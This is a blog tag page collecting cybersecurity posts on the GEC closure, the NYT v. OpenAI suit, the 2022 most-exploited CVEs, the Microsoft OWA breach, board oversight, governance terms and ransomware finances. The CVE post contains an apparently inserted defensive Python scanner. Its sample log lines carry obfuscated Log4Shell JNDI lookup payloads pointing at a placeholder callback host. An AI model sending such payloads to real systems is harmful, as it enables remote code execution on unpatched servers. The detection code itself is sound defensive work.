Tag: cybersecurity

  • Disinformation Unchecked: How Musk and the New Administration Are Already Shaping the Narrative

    The recent closure of the State Department’s Global Engagement Center (GEC) raises significant concerns about the future of U.S. efforts to combat foreign disinformation. Established in 2016, the GEC was pivotal in identifying and countering propaganda from adversarial nations like Russia and China. Its dissolution, following Congress’s decision to cut funding in the National Defense Authorization Act, leaves a critical gap in the nation’s defense against malign information campaigns.

    Critics argue that this move aligns with the incoming administration’s broader agenda to reshape the narrative landscape. Elon Musk, a prominent adviser to President-elect Donald Trump, has previously labeled the GEC “the worst offender in U.S. government censorship [and] media manipulation.” Musk’s influence, coupled with the administration’s intent to reduce government spending, suggests a deliberate shift away from institutional checks on disinformation.

    This development is particularly troubling given the escalating disinformation efforts by foreign actors. In 2024 alone, countries like Russia and China have intensified propaganda campaigns targeting democratic processes in nations such as Taiwan, Moldova, and Georgia. The absence of a dedicated U.S. entity to counter these threats not only undermines global democratic resilience but also signals a potential acquiescence to foreign influence operations.

    Moreover, the closure of the GEC may embolden domestic actors seeking to control narratives without accountability. The intertwining of political interests with media platforms, exemplified by Musk’s dual roles as a tech mogul and government adviser, raises ethical questions about the impartiality of information dissemination. Without transparent mechanisms to counter disinformation, the public remains vulnerable to manipulated narratives that serve specific agendas.

    The termination of the Global Engagement Center represents a significant step back in the fight against disinformation and leaves those in control of media even more powerful. It reflects an unsettling convergence of political and corporate interests aiming to control narratives, potentially at the expense of truth and democratic integrity. As foreign disinformation campaigns continue unabated, the need for robust countermeasures has never been more critical.

    The GEC had ambitious plans to develop advanced technological tools, including:

    • Photoshopped image detection systems
    • Meme detection models
    • AI-generated content detection tools

    Mark Montgomery, a supporter of the center, expressed frustration with the decision, highlighting the ongoing threat of information operations by countries like Russia, China, and Iran.

    Read more here: State Department’s disinformation office to close after funding nixed in NDAA | CyberScoop

  • Will the courts (finally) step in on AI?

    The New York Times vs. OpenAI and Microsoft

    In a groundbreaking legal confrontation, the New York Times has recently filed a copyright infringement lawsuit against OpenAI, the creators of ChatGPT, and Microsoft, a partial owner of OpenAI. This lawsuit delves into the complex and arguably unprecedented issues of copyright law in the age of artificial intelligence. As technology rapidly evolves, so too does the landscape of legal challenges. In his latest post, my friend David Lizerbram explores the intricate details of this case, examining the implications of AI’s use of copyrighted materials without permission and the potential defenses available. Join him as he navigates through the legal intricacies and the broader implications for copyright law in the digital age at New York Times v. OpenAI and Microsoft Copyright Case – David Lizerbram & Associates (lizerbramlaw.com)


    Paul Bergman runs a business strategy and cybersecurity consulting company in San Diego. He writes on cybersecurity and board management for both corporate and nonprofit boards.

  • 2022 Top Routinely Exploited Vulnerabilities

    Hello, fellow tech enthusiasts and cybersecurity-conscious readers! In the ever-evolving landscape of cybersecurity, staying ahead of potential threats is essential. Every year, new vulnerabilities are discovered, and cybercriminals work tirelessly to exploit them. In 2022, some vulnerabilities took center stage as they were routinely targeted by malicious actors. As we embark on a journey into the fascinating world of cybersecurity, we’ll explore the top routinely exploited vulnerabilities that dominated headlines in 2022. So, grab your favorite beverage, get comfy, and let’s dive into the captivating world of cybersecurity!

    1. Log4Shell (CVE-2021-44228)

    Kicking off our list is the notorious Log4Shell vulnerability. While it first came to light at the end of 2021, its impact rippled into 2022. It affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An attacker can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code and giving the attacker control over the affected application. Thanks to the cybersecurity community’s swift response, patches were released, but it serves as a reminder of the importance of regular updates and monitoring.
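    Because the "specially crafted request" is logged before it does any harm, one of the cheapest monitoring steps for Log4Shell is to scan existing web-server logs for the lookup string it relies on. The script below is an added example written for this post, not code from the post, from CISA or from the Log4j project. It scans a handful of constructed access-log lines (documentation IP ranges, `.invalid` callback hosts) for a `jndi:` lookup, after first collapsing the `${lower:…}`, `${upper:…}` and `${::-…}` wrappers that were widely used to evade naive string matching. The log format, sample lines and function names are all assumptions for the example.

```python
import re

# Constructed sample access-log lines (not from the page or any real incident).
# 203.0.113.0/24 is a documentation range; callback hosts use the reserved .invalid TLD.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:13:01:22 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:13:02:01 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://callback.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:13:02:07 +0000] "GET /?q=${${lower:j}ndi:${lower:rmi}://callback.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.12 - - [10/Dec/2021:13:03:44 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://callback.invalid/c}"',
    '203.0.113.20 - - [10/Dec/2021:13:04:10 +0000] "GET /docs/${env:HOME} HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

# Innermost wrapper lookups that change nothing but the spelling of the payload:
# ${lower:x} / ${upper:x} and the ${::-x} "default value" form.
_INNER_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}|\$\{::-([^${}]*)\}', re.IGNORECASE)

# After flattening, the thing a defender cares about is a jndi: lookup (any case).
_JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:[^}]*', re.IGNORECASE)


def normalize_lookups(text):
    """Collapse nested case-changing and default-value lookups until the text stops changing."""
    def _replace(match):
        inner = match.group(1) if match.group(1) is not None else match.group(2)
        return inner.lower()  # case is irrelevant for matching, so fold everything to lower

    previous = None
    while previous != text:
        previous = text
        text = _INNER_LOOKUP.sub(_replace, text)
    return text


def find_jndi_lookups(text):
    """Return every jndi: lookup fragment found in one log line (after de-obfuscation)."""
    normalized = normalize_lookups(text)
    return [m.group(0) for m in _JNDI_LOOKUP.finditer(normalized)]


def scan_log_lines(lines):
    """Return (line_index, flagged_fragment) pairs for lines that carry a jndi: lookup."""
    hits = []
    for index, line in enumerate(lines):
        for fragment in find_jndi_lookups(line):
            hits.append((index, fragment))
    return hits


if __name__ == "__main__":
    for index, fragment in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {index}: suspected Log4Shell probe -> {fragment}")
```

    Running it flags lines 1, 2 and 3 and leaves the harmless `${env:HOME}` line alone. The normaliser only handles the two wrapper families shown, so treat this as a triage aid alongside a maintained rule set and, above all, alongside patching Log4j, which is the point of the post.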

    2. CVE-2018-13379

    This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2022 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.

    3. ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

    These three vulnerabilities, known collectively as ProxyShell, affect Microsoft Exchange Server and made headlines in 2022. Together, they enable attackers to gain unauthorized access to email servers. Regularly applying security updates from Microsoft is essential to protect your organization from ProxyShell attacks.

    4. CVE-2021-40539

    This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.

    5. CVE-2021-26084

    This is an object-graph navigation language (OGNL) injection vulnerability that could allow an unauthenticated threat actor to execute arbitrary code on a Confluence Server or Data Center instance.

    6. CVE-2022-22954, CVE-2022-22960

    These vulnerabilities are RCE, privilege escalation, and authentication bypass vulnerabilities in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.

    7. CVE-2022-1388

    This is a vulnerability in F5 BIG-IP that could allow unauthenticated threat actors to execute arbitrary system commands, create or delete files, or disable services.

    8. CVE-2022-30190

    This is a remote code execution vulnerability affecting Microsoft Windows Support Diagnostic Tool (MSDT) that could allow a remote, unauthenticated threat actor to take control of the system.

    9. CVE-2022-26134

    This is a remote code execution vulnerability in Atlassian Confluence Data Center and Server. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.

    Additional “popular” vulnerabilities

    Among the other often exploited vulnerabilities listed are bugs in products from Citrix (CVE-2019-19781), Microsoft (CVE-2017-0199, CVE-2017-11882, CVE-2020-1472, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, CVE-2021-26857, CVE-2022-41082), Ivanti (CVE-2019-11510), SonicWALL (CVE-2021-20021, CVE-2021-20038), Fortinet (CVE-2022-42475, CVE-2022-40684), QNAP (CVE-2022-27593), and other software manufacturers.

    Some of the vulnerabilities in these lists date back to 2017 and 2018 and are still being widely exploited.

    Staying informed about the top routinely exploited vulnerabilities is a fundamental aspect of cybersecurity. By understanding these threats and taking proactive measures, you can protect your systems and data from malicious actors. 

    REMEMBER TO:

    • Keep all software and libraries up to date.
    • Turn on Multi Factor Authentication or Two Factor Authentication.
    • Regularly monitor your systems for suspicious activity.
    • Develop an incident response plan to mitigate potential threats.
    • Use strong passwords and a VPN.
    • Invest in cybersecurity software.
    • Think before you click on links that look a little off.
    • Be aware of common attack methods.

    Cybersecurity is an ongoing process, and by staying vigilant and informed, you can reduce the risk of falling victim to the latest vulnerabilities and attacks in 2022 and beyond. Let’s take this knowledge and use it to build a safer digital world for all of us. Cheers to a more secure and resilient cyber landscape in 2023 and beyond! Stay secure, stay informed!

    References:

    2022 Top Routinely Exploited Vulnerabilities | CISA

    CISA, NSA, FBI, and International Partners Release Joint CSA on Top Routinely Exploited Vulnerabilities of 2022 | CISA

    AA23-215A: 2022’s Top Routinely Exploited Vulnerabilities – Blog | Tenable®

    How to Protect Yourself from Software Vulnerabilities – Blog | Tenable®


  • Microsoft OWA breach

    Today, we’re diving into a topic that has been making headlines recently. It’s all about the Microsoft Outlook Web App (OWA) breach. I understand that hearing about data breaches can be unsettling, but it’s essential to stay informed and take proactive steps to protect yourself and your information. In this blog post, we’ll break down the Microsoft OWA breach, we’ll talk about what happened, what you can do to protect yourself, and why staying informed is crucial in the digital age. Let’s dive in!

    Understanding The Microsoft OWA breach

    So, what exactly happened? Microsoft’s Outlook Web App (OWA) suffered a security breach that had many users concerned about the safety of their emails, attachments, and personal information. The breach occurred due to a vulnerability that allowed unauthorized access to OWA accounts. Microsoft has since explained the cause of the Azure breach: the corporate account of one of its engineers was compromised by a highly skilled threat actor, who acquired a signing key that was then used to access dozens of Azure and Exchange accounts belonging to high-profile users.

    It’s important to note that not every OWA user was affected, but it’s still crucial to take precautions. Microsoft acted swiftly to address the breach and initiated an investigation. They also took measures to secure the affected OWA servers and notified customers whose data may have been compromised. In addition, they recommended that users change their passwords as a precaution.

    How to Protect Yourself

    1. Change Your Password – If you are using OWA or any other Microsoft services, change your password immediately. Make sure that your password is strong and unique and includes a combination of letters, numbers, and special characters.
    2. Timely Action – Microsoft acted swiftly to patch the vulnerability and address the breach. If you’re using OWA, make sure that your software is updated to the latest version to ensure that you’re protected.
    3. Enable Multi-Factor Authentication (MFA) – If you haven’t already, enable MFA on your OWA account. This adds an extra layer of security by requiring you to verify your identity through a second method, like a code sent to your phone.
    4. Beware of Phishing Attempts – Stay vigilant against phishing emails or suspicious messages. Cybercriminals often take advantage of these situations to trick users into revealing sensitive information.
    5. Monitor Your Accounts – Regularly check your email and financial accounts for any unusual activity. If you notice something suspicious, report it immediately.
    6. Stay Informed – Last but not least, keep up to date with news and updates from Microsoft regarding the breach. They may release additional information or security recommendations.

    The Microsoft OWA breach may have raised some concerns, but always remember that being aware and taking proactive measures are your best allies in the digital world. By keeping your software updated, using strong passwords, enabling MFA, and staying vigilant, you can reduce the risks associated with such incidents. 

    Don’t let this breach discourage you from using technology – it’s an integral part of our lives.

    Instead, let it serve as a reminder to be proactive and informed about cybersecurity. Together, we can make the digital world a safer place for everyone. Stay safe, stay informed, and keep your digital world secure!

    References:

    https://arstechnica.com/security/2023/09/hack-of-a-microsoft-corporate-account-led-to-azure-breach-by-chinese-hackers/

    Outlook Hack: Microsoft Reveals How a Crash Dump Led to a Major Security Breach (thehackernews.com)

    iTWire – Microsoft says Azure breach ‘probably’ due to account being cracked

    How To Prevent A Data Breach In Your Company (forbes.com)


  • How a CISO needs to present to the board

    As a Chief Information Security Officer (CISO), reporting to the corporate board can be both an opportunity and a challenge. On one hand, it’s an opportunity to educate the board on the current state of the company’s security posture, demonstrate the value of security investments, and gain support for future initiatives. On the other hand, it’s a challenge because the board may not be well-versed in technical security concepts, making it difficult to communicate effectively.

    In order to successfully report to the corporate board, a CISO must approach the task with a clear understanding of the board’s expectations and a well-crafted communication strategy. Here are a few key steps to help you do just that:

    Understand the board’s priorities

    Before you present to the board, take the time to understand their priorities and what they are most concerned about. This will help you tailor your presentation to their specific needs and ensure that the information you provide is relevant and valuable.

    Use clear, concise language

    The board is likely to include individuals who are not technically savvy, so it’s important to use clear, concise language that is easy for everyone to understand. Avoid using technical jargon or acronyms, and instead focus on the key security issues that are most relevant to the company’s operations and reputation.

    Emphasize the impact of security risks

    The board needs to understand the impact of security risks on the company’s bottom line. Highlight the potential financial and reputational damage that can result from a security breach, and make sure to demonstrate the value of investments in security technologies and processes.

    Provide regular, comprehensive updates

    The board should receive regular, comprehensive updates on the state of the company’s security posture. These updates should include information on the most significant security risks facing the company, as well as the measures that have been taken to mitigate those risks.

    Encourage open communication

    Encourage open communication with the board, and be prepared to answer any questions they may have. This will help to build trust and ensure that everyone is on the same page when it comes to security issues.

    Be proactive

    A good CISO is always looking ahead to identify potential security risks and developing strategies to mitigate them. Share your vision for the future with the board, and outline the steps that you are taking to stay ahead of the curve.

    In conclusion, reporting to the corporate board as a CISO is an important responsibility, and requires a well-thought-out communication strategy. By understanding the board’s priorities, using clear language, emphasizing the impact of security risks, providing regular updates, encouraging open communication, and being proactive, you can build a strong relationship with the board and help ensure the success of your company’s security efforts.

  • Are you 100% certain that you are on top of security basics?

    At the siberX CISO Forum Canada, C. Kelley Bissel, CVP of Microsoft Security reported that CISOs are failing to do the basics. He puts a fair amount of blame for these failures on the company CISO.

    “Ninety-eight per cent of attacks are elementary and take advantage of unpatched devices, a lack of multifactor authentication to protect logins, no privileged access controls, no identity management, and password vulnerabilities.”

    C. Kelley Bissel, CVP, Microsoft Security

    First, it’s not all on the CISO

    A strong argument could be made that a CISO in a non-security-centric organization is set up to fail. A CISO’s job is difficult even with the full backing of leadership. Consider implementing MFA alone: many executives will push back on the implementation because it isn’t easy.

    Another point of pushback is access control. I first felt this pushback when I was implementing SOX controls and logging on physical access to the company servers on the CIO. The CIO was extremely bothered having to log his access and tried to kill the process as being inefficient. The fact is, he didn’t need access 99.96% of the time anyway. He nearly killed the process which would have led to a possible security exception in an audit. Not a failure of the CISO but a failure of the organization to allow the necessary security.

    So what are ‘security basics’?

    Mr. Bissel outlines the basics as patching, login protection, access control, identity management, and password strength. Certainly, he was simplifying it for presentation but CIS offers a more comprehensive list that includes 56 “Basics” from 18 different controls in Version 8 of the CIS Critical Security Controls.

    See other blog posts for more information on putting in basic cybersecurity.

    Consider looking into vCISO service providers. Tracc Development (site sponsor) or any number of service organizations would be happy to help. Omni Group Consulting and Triden Group have excellent talent.

  • Compliance on the horizon? Understand your terms now!

    I recently worked on a compliance readiness project to get a company ready for an ISO 27002 audit. I was amazed at how little the organization understood about governance. They were having problems with other compliance as well, even though they were a SOX compliance entity. Yes, they had pretty written “policies” but these were clearly designed by the marketing team, had no structure, and included standards, guidelines, procedures, and even documented the people assigned to do it all.

    ISACA defines internal controls as the policies, procedures, practices and organizational structures designed to provide reasonable assurance that business objectives will be achieved and undesired events will be prevented or detected and corrected.

    ISACA COBIT 5 Framework

    Doing it wrong is even worse than not doing it at all!

    Poorly-scoped documentation often results in governance functions becoming more of a hindrance than a help. An example of inadequate governance documentation is a multi-page policy document that mixes high-level security concepts, configuration requirements, and work assignments. This type of documentation can cause confusion and inefficiencies across technology, cybersecurity, and privacy operations. There are several reasons why this type of documentation is bad, including the fact that it is confusing and people are unlikely to read it, which defeats the purpose of having it in the first place. Additionally, excessively-wordy documentation that explains concepts in great detail can make it difficult to understand exact requirements. If compliance (or certification) is a goal this can lead to gaps, which goes against the goal of being audit-ready.

    Start with the goal in mind

    First, start off with the requirements. If the goal is a certification or compliance, your governance should align to the requirements. If you are already compliant with a framework, find a crosswalk, or mapping, from your framework into the desired framework. This can help focus your efforts and help build a plan for what needs to be done.

    For many technologists, words matter. Terms like “policies” and “procedures” are often used interchangeably, but they are not interchangeable. These terms have quite different implications and those differences should be kept in mind, since the use of improper terminology has cascading effects.

    Also keep in mind that an audit will confirm that policies are being enforced. This means that if a policy says “Bob will update the SSL keys”, what happens if Bob retires? The policy will need to be rewritten! That’s undue work AND it is very likely that it will be forgotten. Another common mistake is to be too specific with tools, such as stating “All servers are to be running Windows Server 2008.” Obviously these policies will not age well. While all policies should be reviewed regularly, little mistakes like these can be overlooked.

    Source: http://www.commoncontrolsframework.com/

    Doing it right

    In the realm of cybersecurity documentation, a strong governance structure is built on a hierarchy of components that work together in an integrated approach to managing requirements. Keep these components distinct and don’t try to address everything in one document! These components include:

    Policy: A high-level statement of management intent that formally establishes requirements to guide decisions and achieve rational outcomes. Policies are enforced by standards and further implemented by procedures, and are often created in response to external influences like statutory, regulatory, or contractual obligations.

    Control Objectives: Targets or desired conditions that are designed to ensure policy intent is met. Control objectives help to establish the necessary scope to address a policy and should be directly linked to an industry-recognized practice, such as statutory, regulatory, or contractual requirements.

    Standard: Formally-established requirements related to processes, actions, and configurations that are finite and quantifiable. Standards satisfy control objectives; exceptions are never made to policies, only to standards. If a standard cannot be met, a compensating control should be implemented to mitigate risk.

    Guidelines: Recommended practices that allow for discretion or leeway in interpretation, implementation, or use. Guidelines are based on industry-recognized practices or cultural norms within an organization and augment standards when discretion is permissible.

    Procedure: A formal method of doing something based on a series of actions conducted in a certain order or manner. Procedures are the responsibility of the asset custodian to build and maintain, in support of standards and policies.

    Together, these components create a comprehensive and effective governance structure for managing cybersecurity requirements.

    For more information on governance and cyber security, check out other articles here.

  • What happens to ransomware money?

    Ransomware is a type of malicious software that encrypts a victim’s files. The attackers then demand payment in exchange for the decryption key, typically in the form of cryptocurrency, like Bitcoin, because it is easier to make the exchange anonymous. In recent years, ransomware attacks have become an increasingly common form of cybercrime, and the attackers behind them have been able to generate significant amounts of money. But what happens to all of that ransom money? Where does it go and how is it used?

    The vast majority of ransomware payments make their way to Eastern Europe and the former Soviet Union. These regions have become hubs for cybercrime due to the high level of technical expertise and the relative ease with which criminal operations can be conducted. This raises the question of how closely these criminal organizations are tied to nation states. While Western governments are careful about blaming other nations for such attacks, it is clear that interests are aligned. Western states have noticed an increase in cybercrime activities against them for their support of Ukraine over the last year, clearly an indication of a link in ideologies at the least. It should be noted that North Korea is even more clearly in the cybercrime game and uses funds from ransomware payments to directly finance the regime.

    Once the ransom money has been converted into more liquid forms (local currency), it can be used for a variety of purposes. Some of the ransom money is used to fund the attacker’s lifestyle, including expensive cars, luxury vacations, and high-end real estate. Other money is invested in other criminal operations or laundered through various financial institutions to make it appear as legitimate income.

    While Hollywood likes to portray “hackers” as reserved types in hoodies sitting alone in a dark room, ransomware attacks are often carried out by organized crime syndicates. These organizations are extremely well connected and as well organized as any Fortune 500 company. As with any corporation, part of the revenue goes back into product development: funding the development and distribution of new malware, the creation of botnets, and the purchase of stolen data on the dark web. This money can also be used to bribe law enforcement or government officials, allowing the attackers to operate with impunity.

    The flow of ransomware money is complex and multifaceted, and it is difficult to determine exactly where it all goes. Some of it is used to fund the attackers’ lifestyles, while some is invested into developing new and more complex attacks. Some attacks may directly or indirectly prop up nations.

    If hit with ransomware, each company and individual must evaluate the cost of rebuilding their systems and data against paying the ransom. However, that is a simplistic view of the equation. With the rise of corporate social responsibility, the decision to pay a ransom to restore services must also consider what the ransom proceeds may support.

  • Why boards need to be paying attention to cybersecurity now

    Contrary to popular belief, cybersecurity is not an operations issue! Cybersecurity is frightening, and boards love to disassociate from it by saying it is “operational” and thus not their responsibility. However, it is a critical issue for the whole organization, and the legal requirements for corporate boards to pay attention to this issue are growing. With increasing numbers of data breaches and cyber-attacks, the legal landscape is rapidly evolving to protect both organizations and their customers from the consequences of these events. Here are a few key legal requirements that corporate boards should be aware of when it comes to cybersecurity:

    • Data protection laws: Many countries have enacted data protection laws, such as the European Union’s General Data Protection Regulation (GDPR), that require organizations to take appropriate measures to protect the personal data of their customers and employees. This includes implementing technical and organizational measures to prevent unauthorized access to personal data, and ensuring that the company has a process in place for responding to data breaches.
    • Cybersecurity regulations: Some industries, such as finance and healthcare, have specific cybersecurity regulations that companies must abide by. These regulations can include requirements for regular risk assessments, incident response plans, and the implementation of security technologies.
    • Contractual obligations: Companies often have contractual obligations to their customers and partners to protect the data they are entrusted with. Failing to meet these obligations can result in financial and reputational damage, and may even lead to legal liability.
    • Corporate governance laws: In many countries, corporate boards have a fiduciary duty to ensure that the company is managed in the best interests of its shareholders. This includes taking steps to protect the company’s assets and data from cyber threats.
    • Tort law: Companies can also face legal liability under tort law if they fail to take reasonable steps to protect their customers’ data. This can include negligence, breach of contract, and misrepresentation claims.

    Corporate boards must be aware of the growing legal requirements around cybersecurity. Failure to meet these requirements can result in legal liability, financial losses, and reputational damage. By staying informed about the latest laws and regulations, conducting regular risk assessments, and implementing appropriate security measures, corporate boards can help ensure that their organizations are protected from cyber threats and meet their legal obligations. I outlined a number of items a board should be doing in my post on corporate boards: The role of the corporate board in cybersecurity – Paul Bergman

  • The role of the corporate board in cybersecurity

    The corporate board bears a crucial responsibility for managing cybersecurity risks that threaten organizations of all sizes. As overseers of the company’s cybersecurity posture, board members must take active steps to protect its assets and data from cyber threats. However, some board members may not fully understand their personal liability for lack of oversight in this area.

    Under corporate governance laws, board members have a fiduciary duty to act in the best interests of the shareholders and protect the company from cyber threats. If a board member fails in this duty, they may face personal liability for any resulting losses or damages. According to the landmark 1996 ruling in Caremark, directors can be held accountable if they fail to properly monitor and oversee the company or if their inaction results in a loss. Furthermore, if the company breaches data protection laws, such as the EU’s GDPR, board members may be accountable.

    A framework for addressing cybersecurity risk.

    To effectively mitigate cybersecurity risk, the corporate board should take the following steps:

    1. Stay informed: Invite the CISO or vCISO to present updates, but don’t rely solely on these presentations. Have a board member with technical expertise stay current with industry news, attend security conferences and events, and engage with security experts.
    2. Assess risk posture: Conduct a comprehensive risk assessment to identify areas of weakness and potential vulnerabilities.
    3. Develop a cybersecurity strategy: Based on the results of the risk assessment, outline steps to mitigate risk and protect against cyber threats, including the implementation of technologies, processes, and training programs.
    4. Allocate resources: Ensure the organization has adequate funding and staffing to implement and maintain its security posture.
    5. Foster a culture of security: Encourage security awareness and training throughout the organization and incorporate security into company policies and procedures.
    6. Ensure a true representation of risks: Consider forming a cybersecurity committee working directly with the CISO to ensure a clearer understanding of risks, as executive management may suppress or under-appreciate cybersecurity risks.
    7. Engage with third-party vendors: Partner with a security vendor to supplement internal security efforts and stay updated on the latest security technologies and best practices.
    8. Monitor and review regularly: Establish regular review processes to ensure the organization’s cybersecurity posture remains effective, including reporting from the CISO on threats and regular reviews of security policies, incident response plans, and metrics.

    Clearly, the corporate board has a critical role to play in mitigating cybersecurity risk. By staying informed, assessing the organization’s risk posture, developing a comprehensive cybersecurity strategy, allocating adequate resources, fostering a culture of security, engaging with a third-party vendor, and monitoring and reviewing regularly, the board can help ensure that the company is taking the necessary steps to protect itself against cyber threats.
